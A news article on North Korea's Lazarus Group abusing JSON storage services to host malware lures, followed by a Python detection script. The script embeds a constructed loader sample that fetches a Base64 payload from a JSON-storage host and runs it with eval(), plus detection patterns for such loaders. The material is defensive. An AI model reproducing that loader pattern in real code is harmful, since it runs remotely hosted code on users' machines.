JSON storage services abused by North Korean hackers to host malware

In a recent wave of attacks, the Lazarus Group, a North Korean state-sponsored hacking organization, has been using legitimate JSON storage services to host malicious payloads. The tactic was documented by cybersecurity researchers at NVISO, who observed the group relying on platforms such as JSON Keeper, JSONsilo, and npoint.io so that its payload downloads look like ordinary traffic to a well-known web service rather than a connection to attacker-owned infrastructure.

Malware Delivery Tactics

The attackers lure victims with fake job offers on LinkedIn, which lead targets to run trojanized code and so serve as the entry point for several malware families, including BeaverTail, InvisibleFerret, and TsunamiKit. TsunamiKit is notable as a multi-stage toolkit written in Python and .NET that can operate either as an information stealer or as a cryptojacker: in the latter mode it installs XMRig on the compromised machine and mines Monero for the attackers at the victim's expense.

Researchers have also observed additional malware, such as Tropidoor and AkdoorTea, being delivered through the BeaverTail framework. The breadth of tooling points to a deliberate campaign against software developers, whose machines typically hold source code, credentials, and cryptocurrency wallets.

“It’s clear that the actors behind Contagious Interview are not lagging behind and are trying to cast a very wide net to compromise any software developer that might seem interesting to them, resulting in exfiltration of sensitive data and crypto wallet information,” the researchers cautioned.

The decision to abuse legitimate services such as JSON Keeper and JSON Silo, alongside popular code-hosting platforms such as GitLab and GitHub, shows the attackers' intent to stay unnoticed by blending their activity into normal internet traffic. For defenders, the practical consequence is that domain reputation and blocklists offer little here: the hosts involved are widely used for benign purposes, so detection has to focus on which processes fetch content from these services and on what is done with the retrieved data.
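Because the hosting domains themselves are legitimate, a practical check is to look for the combination the article describes: a project file or process that fetches from a JSON-storage host and then decodes and executes what it received. The following is an added detection example written for this page; it is not code from NVISO's report or from any campaign. The hostnames, the proxy-log format, and the sample loader and log lines are constructed assumptions for illustration and should be replaced with current threat-intelligence indicators and your own log schema.

```python
"""Flag source files and proxy-log lines that reference JSON-storage hosts.

Added detection example for this article. The host list below is an
assumption for illustration, not an indicator list from the researchers.
"""
import re
from urllib.parse import urlparse

# Assumed hostnames for the services named in the article; confirm against
# current threat intelligence before deploying as a detection rule.
SUSPECT_JSON_HOSTS = ("jsonkeeper.com", "jsonsilo.com", "npoint.io")

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)

# Runtime-evaluation sinks a loader would feed a fetched payload into.
EVAL_RE = re.compile(r"\b(eval|exec|Function|vm\.runInThisContext|child_process)\b")
# Decoding helpers that usually accompany a Base64-wrapped remote payload.
B64_RE = re.compile(r"\b(atob|base64|b64decode)\b", re.IGNORECASE)


def host_is_suspect(hostname, suspects=SUSPECT_JSON_HOSTS):
    """True if hostname equals or is a subdomain of a suspect host.

    Exact suffix matching avoids false positives on look-alike domains
    such as 'npoint.io.evil.example'.
    """
    hostname = (hostname or "").lower().rstrip(".")
    return any(hostname == s or hostname.endswith("." + s) for s in suspects)


def suspect_urls(text, suspects=SUSPECT_JSON_HOSTS):
    """Return every URL in text whose host is one of the suspect hosts."""
    return [u for u in URL_RE.findall(text)
            if host_is_suspect(urlparse(u).hostname, suspects)]


def classify_source(text, suspects=SUSPECT_JSON_HOSTS):
    """Score a source file.

    'none': no reference to a suspect host.
    'low':  a URL to a suspect host is present (worth a look, often benign).
    'high': the same file also decodes Base64 and reaches an eval-like sink,
            the shape of a loader that executes a remotely hosted payload.
    Returns (level, matching_urls).
    """
    urls = suspect_urls(text, suspects)
    if not urls:
        return "none", urls
    if EVAL_RE.search(text) and B64_RE.search(text):
        return "high", urls
    return "low", urls


def scan_proxy_log(lines, suspects=SUSPECT_JSON_HOSTS):
    """Return (client_ip, url) for log lines that request a suspect host.

    Assumes a constructed line format:
    '<timestamp> <client_ip> <method> <url> <status>'.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        client, url = parts[1], parts[3]
        if host_is_suspect(urlparse(url).hostname, suspects):
            hits.append((client, url))
    return hits


# Constructed sample: a loader-shaped Node snippet that fetches a Base64 blob
# from a JSON-storage host and executes it. Not real code from any campaign.
SAMPLE_LOADER = '''
const axios = require("axios");
axios.get("https://api.npoint.io/0000examplebin").then(r => {
  const code = Buffer.from(r.data.payload, "base64").toString();
  eval(code);
});
'''

# Constructed sample: a harmless mention of one of the services.
SAMPLE_BENIGN = "See https://jsonkeeper.com for a quick way to host test fixtures.\n"

# Constructed sample proxy-log lines in the assumed format.
SAMPLE_PROXY_LOG = [
    "2025-11-14T10:01:02Z 10.0.0.12 GET https://registry.npmjs.org/axios 200",
    "2025-11-14T10:01:05Z 10.0.0.12 GET https://api.npoint.io/0000examplebin 200",
    "2025-11-14T10:02:11Z 10.0.0.7 GET https://jsonsilo.com/api/v1/example 200",
]

if __name__ == "__main__":
    print("loader :", classify_source(SAMPLE_LOADER))
    print("benign :", classify_source(SAMPLE_BENIGN))
    print("proxy  :", scan_proxy_log(SAMPLE_PROXY_LOG))
```

Run it over a checked-out repository before executing anything from it, and over egress proxy logs from developer workstations; a "high" source hit, or a proxy hit from a process that is not a browser, is the point at which to pull the fetched document and inspect what it contains.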
